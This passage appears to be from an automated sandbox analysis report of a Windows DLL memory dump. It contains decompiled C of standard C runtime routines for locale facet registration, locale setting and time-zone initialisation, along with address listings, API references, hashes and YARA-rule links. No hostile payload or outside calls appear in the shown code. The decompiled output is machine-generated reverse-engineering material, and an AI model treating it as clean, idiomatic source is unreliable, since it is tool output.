								E6E1C66BA( &_v20);
								return E6E1E0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CAA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438( &_v32);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t130, _t174, _t179, 0x14);
										E6E1C6653( &_v20, 0);
										_t180 =  *0x6e286cd0;
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1A161C(0x6e286cbc);
										_t147 = _a8;
										_t175 = E6E1A171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E1C66BA( &_v20);
											return E6E1E0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E1CAAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438( &_v32);
													E6E1E3D74( &_v32, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t130, _t175, _t180, 0x14);
													E6E1C6653( &_v20, 0);
													_t181 =  *0x6e286cd4;
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1A161C(0x6e286cc0);
													_t154 = _a8;
													_t176 = E6E1A171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E1C66BA( &_v20);
														return E6E1E0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E1CAB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1A1438(_t158);
																E6E1E3D74( &_v32, 0x6e283504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e22ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E1C6FD3(__eflags, _t176);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e286cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E1C6FD3(__eflags, _t175);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e286cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t174);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e286ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t173);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e286cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CA106
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA110
int.LIBCPMT ref: 6E1CA127

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

ctype.LIBCPMT ref: 6E1CA14A
std::_Facet_Register.LIBCPMT ref: 6E1CA161
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA181
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA19F

Strings

8k(n, xrefs: 6E1CA11B

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8k(n
API String ID: 1394824916-2802764134
Opcode ID: 3b1ae14bbeb9a4136b77dc707a08270efab26c4ee91e366c85193e4511edb2c1
Instruction ID: 203d0ce524e9c409bb6d7ad40ed71b448bb87f6885a7f0cc4cbc50e4b1fc8aff
Opcode Fuzzy Hash: 3b1ae14bbeb9a4136b77dc707a08270efab26c4ee91e366c85193e4511edb2c1
Instruction Fuzzy Hash: D81136759105188BCF02DBE8C844AFEB77AAF64B14F140808E011EB2D0DF78DD88E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E20E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_v8 =  *0x6e28506c ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6E20D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6E20DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6E20F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6E2091A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6E202188();
									asm("int3");
									_t171 =  *0x6e2876f0;
									 *0x6e285108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6e2851c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6e2851ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6E20DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6E216102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6e230ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6E1E1C3C( &_v528,  *0x6e2851e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6e230de8; // 0x6e1c815c
									 *0x6e22a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6e2852b0;
										if(_t233 != 0x6e2852b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6E20CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6E20CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6E20CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6E20CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6E20CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6E1DF8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

0x6e20e987
0x6e20e996
0x6e20e999
0x6e20e99a
0x6e20e99d
0x6e20e9a1
0x6e20e9a2
0x6e20e9a5
0x6e20e9b5
0x6e20e9d8
0x6e20e9dd
0x6e20e9e2
0x6e20e9f7
0x6e20e9fa
0x6e20e9fa
0x6e20e9fd
0x6e20ea03
0x6e20ea09
0x6e20ea0c
0x6e20ea0e
0x6e20ea11
0x6e20ea18
0x6e20ea1b
0x6e20ea21
0x00000000
0x00000000
0x6e20ea23
0x6e20ea27
0x6e20ea50
0x6e20ea50
0x6e20ea29
0x6e20ea29
0x6e20ea2d
0x6e20ea31
0x6e20ea38
0x6e20ea3e
0x00000000
0x6e20ea40
0x6e20ea40
0x6e20ea43
0x6e20ea46
0x6e20ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20ea4e
0x6e20ea3e
0x6e20ea5d
0x6e20ea5d
0x6e20ea5f
0x6e20ea65
0x6e20ea6b
0x6e20ea6e
0x6e20ea6e
0x6e20ea71
0x6e20ea74
0x6e20ea74
0x6e20ea84
0x6e20ea92
0x6e20ea97
0x6e20ea9e
0x6e20eaa0
0x00000000
0x6e20eaa6
0x6e20eaac
0x6e20eab2
0x6e20eab9
0x6e20eabf
0x6e20eac2
0x6e20eac8
0x6e20ead5
0x6e20eadc
0x6e20eae1
0x6e20eae4
0x6e20eae6
0x6e20ed3f
0x6e20ed45
0x6e20ed46
0x6e20ed47
0x6e20ed48
0x6e20ed49
0x6e20ed4a
0x6e20ed4f
0x6e20ed50
0x6e20ed5b
0x6e20ed63
0x6e20ed69
0x6e20ed6c
0x6e20ed71
0x6e20eaec
0x6e20eaec
0x6e20eafa
0x6e20eafd
0x6e20eb18
0x6e20eb1f
0x6e20eb25
0x6e20eb2b
0x6e20eaff
0x6e20eaff
0x6e20eb07
0x00000000
0x6e20eb09
0x6e20eb09
0x6e20eb0f
0x6e20eb0f
0x6e20eb07
0x6e20eb32
0x6e20eb35
0x6e20ec52
0x6e20ec55
0x6e20ec62
0x6e20ec65
0x6e20ec6d
0x6e20ec6d
0x6e20ec57
0x6e20ec5d
0x6e20ec5d
0x6e20eb3b
0x6e20eb3b
0x6e20eb41
0x6e20eb49
0x6e20eb4b
0x6e20eb4e
0x6e20eb57
0x6e20eb60
0x6e20eb66
0x6e20eb66
0x6e20eb69
0x6e20eb6b
0x00000000
0x00000000
0x6e20eb6d
0x6e20eb73
0x6e20eb74
0x6e20eb7f
0x6e20eb87
0x6e20eb8f
0x6e20eb92
0x6e20eb95
0x6e20eb9b
0x6e20eba1
0x6e20eba7
0x6e20ebad
0x6e20ebb0
0x00000000
0x00000000
0x6e20ebb2
0x6e20ebd7
0x6e20ebd7
0x6e20ebda
0x6e20ebde
0x6e20ebf7
0x6e20ebfc
0x6e20ebff
0x6e20ec01
0x6e20ec07
0x6e20ec42
0x6e20ec09
0x6e20ec09
0x6e20ec0e
0x6e20ec16
0x6e20ec17
0x6e20ec17
0x6e20ec2e
0x6e20ec35
0x6e20ec38
0x6e20ec3d
0x6e20ec3d
0x6e20ec45
0x6e20ec48
0x6e20ec48
0x6e20ec4d
0x00000000
0x6e20ec4d
0x6e20ebb4
0x6e20ebb6
0x6e20ebbb
0x6e20ebc1
0x6e20ebca
0x6e20ebd3
0x6e20ebd3
0x00000000
0x6e20ebb6
0x6e20ec70
0x6e20ec70
0x6e20ec74
0x6e20ec7c
0x6e20ec82
0x6e20ec85
0x6e20ec8b
0x6e20ec8d
0x6e20eccd
0x6e20ecd3
0x6e20ecda
0x6e20ecda
0x6e20ece0
0x6e20ece4
0x00000000
0x6e20ece6
0x6e20ece6
0x6e20ecea
0x6e20ecef
0x6e20ecf3
0x6e20ecf8
0x6e20ecff
0x6e20ed0d
0x6e20ed13
0x6e20ed16
0x6e20ed16
0x6e20ece4
0x6e20ed25
0x6e20ed2d
0x6e20ed36
0x6e20ec8f
0x6e20ec95
0x6e20ec98
0x6e20ec9f
0x6e20ecb1
0x6e20ecb8
0x6e20ecc5
0x00000000
0x6e20ecc5
0x00000000
0x6e20ec8d
0x6e20eae6
0x6e20ea61
0x00000000
0x6e20ea61
0x00000000
0x6e20ea5f
0x6e20ea58
0x6e20ea5a
0x6e20ea5a
0x00000000
0x6e20e9e4
0x6e20e9e4
0x6e20e9e6
0x6e20e9ea
0x6e20e9f6
0x6e20e9f6
0x00000000

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

_memcmp.LIBVCRUNTIME ref: 6E20EC2E
_free.LIBCMT ref: 6E20EC9F
_free.LIBCMT ref: 6E20ECB8
_free.LIBCMT ref: 6E20ECEA
_free.LIBCMT ref: 6E20ECF3
_free.LIBCMT ref: 6E20ECFF

Strings

C, xrefs: 6E20EAEC

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 22e2278fef2eceb4c2a13ef5dc10cc82be1cc51eb67d10aef225fe92f3f378a8
Instruction ID: 5b0b93a21a20beccc85b813fe93f79cc657e95b3aae1d33c2946f6e57672846f
Opcode Fuzzy Hash: 22e2278fef2eceb4c2a13ef5dc10cc82be1cc51eb67d10aef225fe92f3f378a8
Instruction Fuzzy Hash: 29C14975A0121A9FDB64CF58C884A9DB7B6FF49304F5045AAD94AA7394E731AE80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E218951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E218951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;

				_t89 = __edi;
				_t96 = E6E21822B();
				_t1 =  &_v8; // 0x6e232130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E218289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_t106 = _t107;
					_v56 =  *0x6e28506c ^ _t106;
					 *0x6e285384 =  *0x6e285384 | 0xffffffff;
					 *0x6e285378 =  *0x6e285378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6e287a10 = 0;
					_t42 = E6E211216(0x6e232130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6e232130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6E20F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6E211216(0x6e232130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6e232130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E20CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6E20CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6E218951(0x6e232130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6E21877C(0x6e232130, _t90, __eflags);
						}
					}
					E6E20CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6E1DF8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6E218231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E21825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E20CBD3( *0x6e287a08);
							 *0x6e287a08 = 0;
							 *_t107 = 0x6e287a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e287a18 * 0x3c;
								_t88 =  *0x6e287a6c;
								_push(__edi);
								 *0x6e287a10 = 1;
								_v8 = _t85;
								if( *0x6e287a5e != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								if( *0x6e287ab2 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e287ac0;
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E203CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e287a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e287a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6E218225()) = _v8;
							 *(E6E218219()) = _v12;
							_t61 = E6E21821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x6e218951
0x6e218960
0x6e218964
0x6e218967
0x6e21896b
0x6e21896e
0x6e218971
0x6e218976
0x6e218979
0x6e218aa1
0x6e218aa1
0x6e218aa2
0x6e218aa3
0x6e218aa4
0x6e218aa5
0x6e218aa6
0x6e218aab
0x6e218aaf
0x6e218abe
0x6e218ac1
0x6e218ace
0x6e218ad5
0x6e218ad6
0x6e218add
0x6e218aec
0x6e218af3
0x6e218afb
0x6e218afd
0x6e218b07
0x6e218b0a
0x6e218b17
0x6e218b1a
0x6e218b1c
0x6e218b35
0x6e218b3d
0x6e218b3f
0x6e218b45
0x6e218b4a
0x6e218b41
0x6e218b41
0x00000000
0x6e218b41
0x6e218b1e
0x6e218b1e
0x6e218b1f
0x6e218b1f
0x6e218b1f
0x6e218b4c
0x6e218aff
0x6e218aff
0x6e218aff
0x6e218b59
0x6e218b5b
0x6e218b5d
0x6e218b5f
0x6e218b6f
0x6e218b6f
0x6e218b61
0x6e218b61
0x6e218b64
0x00000000
0x6e218b66
0x6e218b66
0x6e218b67
0x6e218b6c
0x6e218b64
0x6e218b75
0x6e218b80
0x6e218b8b
0x6e21897f
0x6e218983
0x6e218988
0x6e21898b
0x00000000
0x6e218991
0x6e218995
0x6e21899a
0x6e21899d
0x00000000
0x6e2189a3
0x6e2189a9
0x6e2189ae
0x6e2189b4
0x6e2189c4
0x6e2189ca
0x6e2189d1
0x6e2189d7
0x6e2189db
0x6e2189e1
0x6e2189eb
0x6e2189f2
0x6e2189f2
0x6e2189fc
0x6e218a14
0x6e218a14
0x6e218a17
0x6e2189fe
0x6e2189fe
0x6e218a05
0x00000000
0x6e218a07
0x6e218a09
0x6e218a0f
0x6e218a0f
0x6e218a05
0x6e218a1f
0x6e218a3b
0x6e218a4b
0x6e218a42
0x6e218a44
0x6e218a44
0x6e218a69
0x6e218a7b
0x6e218a70
0x6e218a73
0x6e218a73
0x6e218a69
0x6e218a85
0x6e218a8f
0x6e218a94
0x6e218a99
0x6e218aa0
0x6e218aa0
0x6e21899d
0x6e21898b

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60
_free.LIBCMT ref: 6E2189A9

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E218B75

Strings

0!#n, xrefs: 6E218964, 6E21896A
0!#n, xrefs: 6E218AD8

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!#n$0!#n
API String ID: 1286116820-3624508691
Opcode ID: 1828f2b09bdc5ad7e49f89684899cd7bb104726caea3e3faa449be96005b1205
Instruction ID: e372011220b55871f39097894fc21775425ffea736f2159fa9be8215c809bda3
Opcode Fuzzy Hash: 1828f2b09bdc5ad7e49f89684899cd7bb104726caea3e3faa449be96005b1205
Instruction Fuzzy Hash: F051B97190861EEFDB04DFE58CC49EAB7FFAB46354B10066AE621E7290D7309B44C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1CFC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t66 - 0x14, 0);
				_t63 =  *0x6e286dd0;
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1A161C(0x6e286d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1A171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E1C66BA(_t66 - 0x14);
					return E6E1E0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E1D162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1A1438(_t55);
							E6E1E3D74(_t66 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e22c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E1D542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E1E0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E1C6FD3(__eflags, _t61);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e286dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
